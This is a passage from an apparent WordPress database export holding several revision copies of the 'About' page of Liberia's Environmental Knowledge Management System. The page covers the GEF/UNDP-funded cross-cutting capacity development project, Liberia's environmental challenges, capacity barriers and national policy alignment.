relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>','About','','inherit','closed','closed','','68-revision-v1','','','2022-09-02 10:51:05','2022-09-02 10:51:05','',68,'https://ekmsliberia.info/?p=4993',0,'revision','',0),(4994,42,'2022-09-02 10:51:05','2022-09-02 10:51:05','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>','About','','inherit','closed','closed','','68-revision-v1','','','2022-09-02 10:51:05','2022-09-02 10:51:05','',68,'https://ekmsliberia.info/?p=4994',0,'revision','',0),(4995,42,'2022-09-02 10:51:06','2022-09-02 10:51:06','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate 